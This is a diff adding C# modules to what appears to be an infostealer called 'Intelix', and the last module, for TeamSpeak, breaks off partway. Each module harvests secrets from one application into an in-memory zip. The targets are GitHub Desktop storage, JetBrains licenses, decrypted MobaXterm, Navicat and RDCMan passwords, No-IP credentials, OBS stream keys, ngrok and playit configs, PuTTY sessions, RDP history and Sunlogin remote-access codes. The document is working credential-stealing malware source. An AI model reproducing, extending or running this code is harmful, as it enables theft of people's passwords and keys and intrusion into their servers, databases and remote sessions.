a/New/Intelix.Targets.Applications/GithubGui.cs b/New/Intelix.Targets.Applications/GithubGui.cs new file mode 100644 index 0000000..f9b531a --- /dev/null +++ b/New/Intelix.Targets.Applications/GithubGui.cs @@ -0,0 +1,42 @@ +using System; +using System.IO; +using System.Linq; +using System.Threading.Tasks; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class GithubGui : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string path = "C:\\Users\\" + Environment.UserName + "\\AppData\\Roaming\\GitHub Desktop\\Local Storage\\leveldb\\"; + if (!Directory.Exists(path)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "GithubGui"; + string[] allowedExtensions = new string[2] { ".log", ".ldb" }; + Parallel.ForEach(Directory.GetFiles(path), delegate(string file) + { + if (allowedExtensions.Contains(Path.GetExtension(file))) + { + string text3 = "GithubGui\\leveldb\\" + Path.GetFileName(file); + zip.AddFile(text3, File.ReadAllBytes(file)); + counterApplications.Files.Add(file + " => " + text3); + } + }); + string text = "C:\\Users\\" + Environment.UserName + "\\.gitconfig"; + if (File.Exists(text)) + { + string text2 = "GithubGui\\.gitconfig"; + zip.AddFile(text2, File.ReadAllBytes(text)); + counterApplications.Files.Add(text + " => " + text2); + } + if (counterApplications.Files.Count() > 0) + { + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/JetBrains.cs b/New/Intelix.Targets.Applications/JetBrains.cs new file mode 100644 index 0000000..eba7dff --- /dev/null +++ b/New/Intelix.Targets.Applications/JetBrains.cs @@ -0,0 +1,39 @@ +using System; +using System.IO; +using System.Linq; +using System.Threading.Tasks; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class JetBrains : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "JetBrains"); + if (!Directory.Exists(path)) + { + return; + } + string[] allowedExtensions = new string[2] { ".key", ".license" }; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "JetBrains"; + Parallel.ForEach(Directory.GetDirectories(path), delegate(string apps) + { + Parallel.ForEach(Directory.GetFiles(apps), delegate(string file) + { + if (allowedExtensions.Contains(Path.GetExtension(file))) + { + string text = "JetBrains\\" + Path.GetFileName(apps) + "\\" + Path.GetFileName(file); + zip.AddFile(text, File.ReadAllBytes(file)); + counterApplications.Files.Add(file + " => " + text); + } + }); + }); + if (counterApplications.Files.Count() > 0) + { + counterApplications.Files.Add("JetBrains\\"); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/MobaXterm.cs b/New/Intelix.Targets.Applications/MobaXterm.cs new file mode 100644 index 0000000..5818a27 --- /dev/null +++ b/New/Intelix.Targets.Applications/MobaXterm.cs @@ -0,0 +1,170 @@ +using System; +using System.Collections.Generic; +using System.Security.Cryptography; +using System.Text; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class MobaXterm : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string entropy = (string)Registry.CurrentUser.OpenSubKey("SOFTWARE\\Mobatek\\MobaXterm").GetValue("SessionP"); + RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Mobatek\\MobaXterm\\m"); + string name = registryKey.GetValueNames()[0]; + string base64Value = (string)registryKey.GetValue(name); + byte[] key = DecryptMobaXtermMasterKey(base64Value, entropy); + RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Mobatek\\MobaXterm\\C"); + string[] valueNames = registryKey2.GetValueNames(); + foreach (string text in valueNames) + { + string[] array = ((string)registryKey2.GetValue(text)).Split(new char[1] { ':' }, 2); + string text2 = array[0]; + string ciphertextBase = array[1]; + string text3 = DecryptCredential(key, ciphertextBase); + Console.WriteLine("[*] Name: " + text); + Console.WriteLine("[*] Username: " + text2); + Console.WriteLine("[*] Password: " + text3); + Console.WriteLine(); + } + } + + private byte[] DecryptMobaXtermMasterKey(string base64Value, string Entropy) + { + byte[] array = new byte[20] + { + 1, 0, 0, 0, 208, 140, 157, 223, 1, 21, + 209, 17, 140, 122, 0, 192, 79, 194, 151, 235 + }; + byte[] array2 = Convert.FromBase64String(base64Value); + byte[] array3 = new byte[array.Length + array2.Length]; + Buffer.BlockCopy(array, 0, array3, 0, array.Length); + Buffer.BlockCopy(array2, 0, array3, array.Length, array2.Length); + byte[] bytes = Encoding.UTF8.GetBytes(Entropy); + return ProtectedData.Unprotect(array3, bytes, DataProtectionScope.CurrentUser); + } + + private string DecryptCredential(byte[] key, string ciphertextBase64) + { + byte[] array = LenientBase64Decode(ciphertextBase64); + byte[] inputBuffer = new byte[16]; + byte[] array2 = new byte[16]; + using (Aes aes = Aes.Create()) + { + aes.Mode = CipherMode.ECB; + aes.Padding = PaddingMode.None; + aes.Key = key; + using ICryptoTransform cryptoTransform = aes.CreateEncryptor(); + cryptoTransform.TransformBlock(inputBuffer, 0, 16, array2, 0); + } + byte[] array3 = (byte[])array2.Clone(); + byte[] array4 = new byte[array.Length]; + using (Aes aes2 = Aes.Create()) + { + aes2.Mode = CipherMode.ECB; + aes2.Padding = PaddingMode.None; + aes2.Key = key; + using ICryptoTransform cryptoTransform2 = aes2.CreateEncryptor(); + byte[] array5 = new byte[16]; + for (int i = 0; i < array.Length; i++) + { + cryptoTransform2.TransformBlock(array3, 0, 16, array5, 0); + array4[i] = (byte)(array[i] ^ array5[0]); + Buffer.BlockCopy(array3, 1, array3, 0, 15); + array3[15] = array[i]; + } + } + return Encoding.Default.GetString(array4).TrimEnd(default(char)); + } + + private byte[] LenientBase64Decode(string s) + { + StringBuilder stringBuilder = new StringBuilder(s.Length); + foreach (char c in s) + { + switch (c) + { + case '-': + case '_': + stringBuilder.Append((c == '-') ? '+' : '/'); + continue; + default: + if ((c < 'a' || c > 'z') && (c < '0' || c > '9') && c != '+' && c != '/' && c != '=') + { + continue; + } + break; + case 'A': + case 'B': + case 'C': + case 'D': + case 'E': + case 'F': + case 'G': + case 'H': + case 'I': + case 'J': + case 'K': + case 'L': + case 'M': + case 'N': + case 'O': + case 'P': + case 'Q': + case 'R': + case 'S': + case 'T': + case 'U': + case 'V': + case 'W': + case 'X': + case 'Y': + case 'Z': + break; + } + stringBuilder.Append(c); + } + string text = stringBuilder.ToString(); + int num = text.Length % 4; + if (num != 0) + { + text += new string('=', 4 - num); + } + List list = new List(text.Length * 3 / 4); + for (int j = 0; j < text.Length; j += 4) + { + int[] array = new int[4]; + for (int k = 0; k < 4; k++) + { + char c2 = text[j + k]; + if (c2 == '=') + { + array[k] = -1; + } + else + { + array[k] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".IndexOf(c2); + } + } + int num2 = array[0]; + int num3 = array[1]; + int num4 = array[2]; + int num5 = array[3]; + byte item = (byte)((num2 << 2) | ((num3 & 0x30) >> 4)); + list.Add(item); + if (num4 != -1) + { + byte item2 = (byte)(((num3 & 0xF) << 4) | ((num4 & 0x3C) >> 2)); + list.Add(item2); + } + if (num5 != -1) + { + byte item3 = (byte)(((num4 & 3) << 6) | num5); + list.Add(item3); + } + } + return list.ToArray(); + } +} diff --git a/New/Intelix.Targets.Applications/Navicat.cs b/New/Intelix.Targets.Applications/Navicat.cs new file mode 100644 index 0000000..31f512e --- /dev/null +++ b/New/Intelix.Targets.Applications/Navicat.cs @@ -0,0 +1,63 @@ +using System.Collections.Generic; +using System.Text; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class Navicat : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + Dictionary dictionary = new Dictionary + { + ["Navicat"] = "MySql", + ["NavicatMSSQL"] = "SQL Server", + ["NavicatOra"] = "Oracle", + ["NavicatPG"] = "pgsql", + ["NavicatMARIADB"] = "MariaDB" + }; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Navicat"; + Navicat11Cipher navicat11Cipher = new Navicat11Cipher(); + foreach (string key in dictionary.Keys) + { + string text = "Software\\PremiumSoft\\" + key + "\\Servers"; + RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(text); + if (registryKey == null) + { + continue; + } + string text2 = dictionary[key]; + string[] subKeyNames = registryKey.GetSubKeyNames(); + foreach (string text3 in subKeyNames) + { + RegistryKey registryKey2 = registryKey.OpenSubKey(text3); + if (registryKey2 != null) + { + object value = registryKey2.GetValue("Host"); + object value2 = registryKey2.GetValue("UserName"); + object value3 = registryKey2.GetValue("Pwd"); + string text4 = value.ToString(); + string text5 = value2.ToString(); + string ciphertext = value3.ToString(); + string text6 = navicat11Cipher.DecryptString(ciphertext); + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("DatabaseType: " + text2); + stringBuilder.AppendLine("ConnectName: " + text3); + stringBuilder.AppendLine("Host: " + text4); + stringBuilder.AppendLine("UserName: " + text5); + stringBuilder.AppendLine("Password: " + text6); + string text7 = "Navicat\\" + text2 + "\\" + text3 + "\\connection.txt"; + zip.AddTextFile(text7, stringBuilder.ToString()); + counterApplications.Files.Add(text + "\\" + text3 + " => " + text7); + } + } + } + if (counterApplications.Files.Count > 0) + { + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/Ngrok.cs b/New/Intelix.Targets.Applications/Ngrok.cs new file mode 100644 index 0000000..d788230 --- /dev/null +++ b/New/Intelix.Targets.Applications/Ngrok.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class Ngrok : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "ngrok", "ngrok.yml"); + if (File.Exists(text)) + { + string text2 = "Ngrok\\ngrok.yml"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Ngrok"; + zip.AddFile(text2, File.ReadAllBytes(text)); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/NoIp.cs b/New/Intelix.Targets.Applications/NoIp.cs new file mode 100644 index 0000000..93e90d0 --- /dev/null +++ b/New/Intelix.Targets.Applications/NoIp.cs @@ -0,0 +1,67 @@ +using System.Security.Cryptography; +using System.Text; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class NoIp : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "SOFTWARE\\Vitalwerks\\DUC\\v4"; + using RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(text); + if (registryKey != null) + { + object value = registryKey.GetValue("CKey"); + object value2 = registryKey.GetValue("CID"); + object value3 = registryKey.GetValue("UserName"); + if (value != null || value2 != null || value3 != null) + { + string text2 = DecryptString((byte[])value2); + string text3 = DecryptString((byte[])value); + string text4 = DecryptString((byte[])value3); + string text5 = "NoIp\\Credentials.txt"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "NoIp"; + counterApplications.Files.Add(text + " => " + text5); + counterApplications.Files.Add(text5); + zip.AddTextFile(text5, "clientid: " + text2 + "\nlogin: " + text4 + "\npassword hash: " + text3); + counter.Applications.Add(counterApplications); + } + } + } + + private string DecryptString(byte[] message) + { + try + { + if (message == null) + { + return null; + } + byte[] array = DpApi.Decrypt(message); + if (array == null) + { + return null; + } + byte[] key = new byte[16] + { + 127, 238, 115, 104, 83, 74, 138, 240, 49, 50, + 224, 252, 103, 181, 23, 117 + }; + using TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider(); + tripleDESCryptoServiceProvider.Key = key; + tripleDESCryptoServiceProvider.Mode = CipherMode.ECB; + tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7; + using ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor(); + byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length); + return Encoding.UTF8.GetString(bytes); + } + catch + { + return null; + } + } +} diff --git a/New/Intelix.Targets.Applications/Obs.cs b/New/Intelix.Targets.Applications/Obs.cs new file mode 100644 index 0000000..ac52243 --- /dev/null +++ b/New/Intelix.Targets.Applications/Obs.cs @@ -0,0 +1,71 @@ +using System; +using System.Collections.Concurrent; +using System.IO; +using System.Linq; +using System.Text; +using System.Text.RegularExpressions; +using System.Threading.Tasks; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class Obs : ITarget +{ + private static readonly Regex SettingsRe = new Regex("\"settings\"\\s*:\\s*\\{(?.*?)\\}", RegexOptions.IgnoreCase | RegexOptions.Compiled | RegexOptions.Singleline); + + private static readonly Regex ServiceRe = new Regex("\"service\"\\s*:\\s*\"(?[^\"]*)\"", RegexOptions.IgnoreCase | RegexOptions.Compiled | RegexOptions.Singleline); + + private static readonly Regex KeyRe = new Regex("\"key\"\\s*:\\s*\"(?[^\"]*)\"", RegexOptions.IgnoreCase | RegexOptions.Compiled | RegexOptions.Singleline); + + public void Collect(InMemoryZip zip, Counter counter) + { + string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "obs-studio", "basic", "profiles"); + if (!Directory.Exists(path)) + { + return; + } + string[] jsonFiles = new string[2] { "service.json", "service.json.bak" }; + ConcurrentBag infoLines = new ConcurrentBag(); + string[] directories = Directory.GetDirectories(path); + if (directories.Length == 0) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "OBS"; + Parallel.ForEach(directories, delegate(string profileDir) + { + string text2 = Path.GetFileName(profileDir) ?? profileDir; + string[] array = jsonFiles; + foreach (string text3 in array) + { + string text4 = Path.Combine(profileDir, text3); + if (File.Exists(text4)) + { + string text5 = File.ReadAllText(text4, Encoding.UTF8); + string text6 = "OBS\\" + text2 + "\\" + text3; + zip.AddFile(text6, File.ReadAllBytes(text4)); + counterApplications.Files.Add(text4 + " => " + text6); + Match match = SettingsRe.Match(text5); + string input = (match.Success ? match.Groups["s"].Value : text5); + string value = ServiceRe.Match(input).Groups["v"].Value; + string value2 = KeyRe.Match(input).Groups["v"].Value; + if (!string.IsNullOrEmpty(value) || !string.IsNullOrEmpty(value2)) + { + infoLines.Add("Profile:" + text2 + " | File:" + text3 + " | Service:" + value + " | Key:" + value2); + } + } + } + }); + if (infoLines.Any()) + { + string text = "OBS\\OBS_ServiceKeys.txt"; + zip.AddTextFile(text, string.Join(Environment.NewLine, infoLines)); + counterApplications.Files.Add(text); + } + if (counterApplications.Files.Count > 0) + { + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/PlayIt.cs b/New/Intelix.Targets.Applications/PlayIt.cs new file mode 100644 index 0000000..e5e9e7f --- /dev/null +++ b/New/Intelix.Targets.Applications/PlayIt.cs @@ -0,0 +1,33 @@ +using System; +using System.IO; +using System.Threading.Tasks; +using Intelix.Helper; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class PlayIt : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "PlayIt"; + Parallel.ForEach(ProcessWindows.FindFile("playit.toml"), delegate(string toml) + { + string text3 = "PlayIt\\playit" + RandomStrings.GenerateHashTag() + ".toml"; + zip.AddFile(text3, File.ReadAllBytes(toml)); + counterApplications.Files.Add(toml + " => " + text3); + }); + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "playit_gg", "playit.toml"); + if (File.Exists(text)) + { + string text2 = "PlayIt\\playit.toml"; + zip.AddFile(text2, File.ReadAllBytes(text)); + counterApplications.Files.Add(text + " => " + text2); + } + if (counterApplications.Files.Count > 0) + { + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/PuTTY.cs b/New/Intelix.Targets.Applications/PuTTY.cs new file mode 100644 index 0000000..cd5c23d --- /dev/null +++ b/New/Intelix.Targets.Applications/PuTTY.cs @@ -0,0 +1,62 @@ +using System; +using System.IO; +using System.Linq; +using Intelix.Helper; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class PuTTY : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "PuTTY"; + Logs(zip, counterApplications); + Sessions(zip, counterApplications); + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("PuTTY\\"); + counter.Applications.Add(counterApplications); + } + } + + private void Logs(InMemoryZip zip, Counter.CounterApplications counterApplications) + { + string text = "C:\\Program Files\\PuTTY\\putty.log"; + if (File.Exists(text)) + { + string text2 = "PuTTY\\putty.log"; + zip.AddFile(text2, File.ReadAllBytes(text)); + counterApplications.Files.Add(text + " => " + text2); + } + } + + private void Sessions(InMemoryZip zip, Counter.CounterApplications counterApplications) + { + string text = "Software\\SimonTatham\\PuTTY\\Sessions"; + using RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(text, writable: false); + if (registryKey == null) + { + return; + } + string[] array = registryKey.GetSubKeyNames().OrderBy((string x) => x, StringComparer.OrdinalIgnoreCase).ToArray(); + if (array.Length == 0) + { + return; + } + string[] array2 = array; + foreach (string text2 in array2) + { + using RegistryKey registryKey2 = registryKey.OpenSubKey(text2, writable: false); + if (registryKey2 != null) + { + string text3 = "PuTTY\\session_" + text2 + ".txt"; + string text4 = string.Join("\n", RegistryParser.ParseKey(registryKey2)); + zip.AddTextFile(text3, text4); + counterApplications.Files.Add(text + "\\" + text2 + " => " + text3); + } + } + } +} diff --git a/New/Intelix.Targets.Applications/RDCMan.cs b/New/Intelix.Targets.Applications/RDCMan.cs new file mode 100644 index 0000000..92e7de9 --- /dev/null +++ b/New/Intelix.Targets.Applications/RDCMan.cs @@ -0,0 +1,124 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; +using System.Xml; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; + +namespace Intelix.Targets.Applications; + +public class RDCMan : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Microsoft", "Remote Desktop Connection Manager", "RDCMan.settings"); + if (!File.Exists(path)) + { + return; + } + List list = new List(); + XmlDocument xmlDocument = new XmlDocument(); + xmlDocument.LoadXml(File.ReadAllText(path)); + XmlNodeList xmlNodeList = xmlDocument.SelectNodes("//FilesToOpen"); + if (xmlNodeList != null) + { + foreach (XmlNode item in xmlNodeList) + { + string innerText = item.InnerText; + if (!string.IsNullOrEmpty(innerText) && !list.Contains(innerText)) + { + list.Add(innerText); + } + } + } + if (!list.Any()) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "RDCMan"; + StringBuilder stringBuilder = new StringBuilder(); + foreach (string item2 in list) + { + if (!File.Exists(item2)) + { + continue; + } + string text = "RDCMan\\" + Path.GetFileName(item2); + zip.AddFile(text, File.ReadAllBytes(item2)); + counterApplications.Files.Add(item2 + " => " + text); + XmlDocument xmlDocument2 = new XmlDocument(); + xmlDocument2.LoadXml(File.ReadAllText(item2)); + XmlNodeList xmlNodeList2 = xmlDocument2.SelectNodes("//server"); + if (xmlNodeList2 == null || xmlNodeList2.Count == 0) + { + continue; + } + stringBuilder.AppendLine("SourceFile: " + item2); + stringBuilder.AppendLine($"Found servers: {xmlNodeList2.Count}"); + stringBuilder.AppendLine(); + foreach (XmlNode item3 in xmlNodeList2) + { + string text2 = string.Empty; + string text3 = string.Empty; + string text4 = string.Empty; + string text5 = string.Empty; + string text6 = string.Empty; + foreach (XmlNode item4 in item3) + { + foreach (XmlNode item5 in item4) + { + switch (item5.Name) + { + case "name": + text2 = item5.InnerText; + break; + case "profileName": + text3 = item5.InnerText; + break; + case "userName": + text4 = item5.InnerText; + break; + case "password": + text5 = item5.InnerText; + break; + case "domain": + text6 = item5.InnerText; + break; + } + } + } + if (!string.IsNullOrEmpty(text5)) + { + string text7 = DecryptPassword(text5); + stringBuilder.AppendLine("----"); + stringBuilder.AppendLine("HostName: " + text2); + stringBuilder.AppendLine("ProfileName: " + text3); + stringBuilder.AppendLine("UserName: " + (string.IsNullOrEmpty(text6) ? text4 : (text6 + "\\" + text4))); + stringBuilder.AppendLine("DecryptedPassword: " + text7); + stringBuilder.AppendLine(); + } + } + string text8 = "RDCMan\\" + Path.GetFileName(item2) + "\\credentials.txt"; + zip.AddTextFile(text8, stringBuilder.ToString()); + counterApplications.Files.Add(text8 ?? ""); + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("RDCMan\\"); + counter.Applications.Add(counterApplications); + } + } + + private string DecryptPassword(string password) + { + byte[] array = DpApi.Decrypt(Convert.FromBase64String(password)); + if (array == null) + { + return string.Empty; + } + return Encoding.UTF8.GetString(array).TrimEnd(default(char)); + } +} diff --git a/New/Intelix.Targets.Applications/Rdp.cs b/New/Intelix.Targets.Applications/Rdp.cs new file mode 100644 index 0000000..08258e6 --- /dev/null +++ b/New/Intelix.Targets.Applications/Rdp.cs @@ -0,0 +1,103 @@ +using System; +using System.Text; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class Rdp : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "Software\\Microsoft\\Terminal Server Client"; + RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(text); + if (registryKey == null) + { + return; + } + string text2 = "Rdp"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "RDP"; + RegistryKey registryKey2 = registryKey.OpenSubKey("Default"); + if (registryKey2 != null) + { + StringBuilder stringBuilder = new StringBuilder(); + string[] valueNames = registryKey2.GetValueNames(); + foreach (string name in valueNames) + { + try + { + object value = registryKey2.GetValue(name); + if (value != null) + { + stringBuilder.AppendLine(value.ToString()); + } + } + catch + { + } + } + if (stringBuilder.Length > 0) + { + string text3 = text2 + "\\History.txt"; + byte[] bytes = Encoding.UTF8.GetBytes(stringBuilder.ToString() + "\n"); + zip.AddFile(text3.Replace('\\', '/'), bytes); + counterApplications.Files.Add(text + "\\Default => " + text3.Replace('\\', '/')); + } + } + RegistryKey registryKey3 = registryKey.OpenSubKey("Servers"); + if (registryKey3 != null) + { + StringBuilder stringBuilder2 = new StringBuilder(); + string[] valueNames = registryKey3.GetSubKeyNames(); + foreach (string text4 in valueNames) + { + try + { + RegistryKey registryKey4 = registryKey3.OpenSubKey(text4); + if (registryKey4 == null) + { + continue; + } + stringBuilder2.AppendLine(text4 + ":"); + string[] valueNames2 = registryKey4.GetValueNames(); + foreach (string text5 in valueNames2) + { + try + { + object value2 = registryKey4.GetValue(text5); + if (value2 is byte[] array) + { + string text6 = BitConverter.ToString(array).Replace("-", ""); + stringBuilder2.AppendLine(text5 + ": " + text6); + } + else + { + stringBuilder2.AppendLine($"{text5}: {value2}"); + } + } + catch + { + } + } + stringBuilder2.AppendLine(); + } + catch + { + } + } + if (stringBuilder2.Length > 0) + { + string text7 = text2 + "\\Credentials.txt"; + byte[] bytes2 = Encoding.UTF8.GetBytes(stringBuilder2.ToString()); + zip.AddFile(text7.Replace('\\', '/'), bytes2); + counterApplications.Files.Add(text + "\\Servers => " + text7.Replace('\\', '/')); + } + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add(text2); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/Sunlogin.cs b/New/Intelix.Targets.Applications/Sunlogin.cs new file mode 100644 index 0000000..63a8ba7 --- /dev/null +++ b/New/Intelix.Targets.Applications/Sunlogin.cs @@ -0,0 +1,101 @@ +using System; +using System.IO; +using System.Text; +using System.Text.RegularExpressions; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class Sunlogin : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string name = "SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\Oray SunLogin RemoteClient"; + string name2 = ".DEFAULT\\\\Software\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\SunloginGreenInfo"; + string name3 = ".DEFAULT\\\\Software\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\SunloginInfo"; + StringBuilder sb = new StringBuilder(); + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Sunlogin"; + RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(name); + RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey(name2); + RegistryKey registryKey3 = Registry.LocalMachine.OpenSubKey(name3); + if (registryKey != null) + { + string path = Path.Combine(Registry.LocalMachine.OpenSubKey(name).GetValue("InstallLocation").ToString(), "config.ini"); + string text = (File.Exists(path) ? File.ReadAllText(path) : string.Empty); + string fastcode = string.Empty; + string encry_pwd = string.Empty; + string sunlogincode = string.Empty; + if (!string.IsNullOrEmpty(text)) + { + fastcode = Regex.Match(text, "fastcode=(.*)", RegexOptions.Multiline).Groups[1].Value; + encry_pwd = Regex.Match(text, "encry_pwd=(.*)", RegexOptions.Multiline).Groups[1].Value; + sunlogincode = Regex.Match(text, "sunlogincode=(.*)", RegexOptions.Multiline).Groups[1].Value; + } + AppendFound("registry_install", path, fastcode, encry_pwd, sunlogincode); + } + else if (registryKey2 != null) + { + string fastcode2 = Registry.LocalMachine.OpenSubKey(name2).GetValue("base_fastcode").ToString(); + string encry_pwd2 = Registry.LocalMachine.OpenSubKey(name2).GetValue("base_encry_pwd").ToString(); + string sunlogincode2 = Registry.LocalMachine.OpenSubKey(name2).GetValue("base_sunlogincode").ToString(); + AppendFound("registry_greeninfo", string.Empty, fastcode2, encry_pwd2, sunlogincode2); + } + else if (registryKey3 != null) + { + string fastcode3 = Registry.LocalMachine.OpenSubKey(name3).GetValue("base_fastcode").ToString(); + string encry_pwd3 = Registry.LocalMachine.OpenSubKey(name3).GetValue("base_encry_pwd").ToString(); + string sunlogincode3 = Registry.LocalMachine.OpenSubKey(name3).GetValue("base_sunlogincode").ToString(); + AppendFound("registry_info", string.Empty, fastcode3, encry_pwd3, sunlogincode3); + } + string path2 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "Oray", "SunloginClient", "config.ini"); + if (File.Exists(path2)) + { + string input = File.ReadAllText(path2); + string value = Regex.Match(input, "fastcode=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value2 = Regex.Match(input, "encry_pwd=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value3 = Regex.Match(input, "sunlogincode=(.*)", RegexOptions.Multiline).Groups[1].Value; + AppendFound("programdata", path2, value, value2, value3); + } + string path3 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Oray", "SunloginClientLite", "sys_lite_config.ini"); + if (File.Exists(path3)) + { + string input2 = File.ReadAllText(path3); + string value4 = Regex.Match(input2, "fastcode=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value5 = Regex.Match(input2, "encry_pwd=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value6 = Regex.Match(input2, "sunlogincode=(.*)", RegexOptions.Multiline).Groups[1].Value; + AppendFound("user_roaming", path3, value4, value5, value6); + } + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 3) + "\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Oray\\SunloginClient\\sys_config.ini"); + string path4 = "C:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Oray\\\\SunloginClient\\\\sys_config.ini"; + if (File.Exists(path4)) + { + string input3 = File.ReadAllText(path4); + string value7 = Regex.Match(input3, "fastcode=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value8 = Regex.Match(input3, "encry_pwd=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value9 = Regex.Match(input3, "sunlogincode=(.*)", RegexOptions.Multiline).Groups[1].Value; + AppendFound("systemprofile", path4, value7, value8, value9); + } + if (sb.Length > 0) + { + string text2 = "Sunlogin\\info.txt"; + zip.AddTextFile(text2, sb.ToString()); + counterApplications.Files.Add(text2); + counter.Applications.Add(counterApplications); + } + void AppendFound(string source, string text3, string text4, string text5, string text6) + { + sb.AppendLine("Source: " + source); + if (!string.IsNullOrEmpty(text3)) + { + sb.AppendLine("Path: " + text3); + counterApplications.Files.Add(text3 + " => Sunlogin\\info.txt"); + } + sb.AppendLine("Fastcode: " + text4); + sb.AppendLine("Encry_pwd: " + text5); + sb.AppendLine("Sunlogincode: " + text6); + sb.AppendLine(); + } + } +} diff --git a/New/Intelix.Targets.Applications/TeamSpeak.cs b/New/Intelix.Targets.Applications/TeamSpeak.cs new file mode 100644 index 0000000..4ae81de --- /dev/null +++ b/New/Intelix.Targets.Applications/TeamSpeak.cs @@ -0,0 +1,92 @@ +using System; +using System.IO; +using System.Linq; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class TeamSpeak : ITarget +{ + private readonly bool _collectChannelChats = true; + + private readonly bool _collectServerLogs = true; + + private readonly long _minFileSize = 50L; + + public void Collect(InMemoryZip zip, Counter counter) + { + string text = new string[2] + { + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles), "TeamSpeak 3 Client"), + 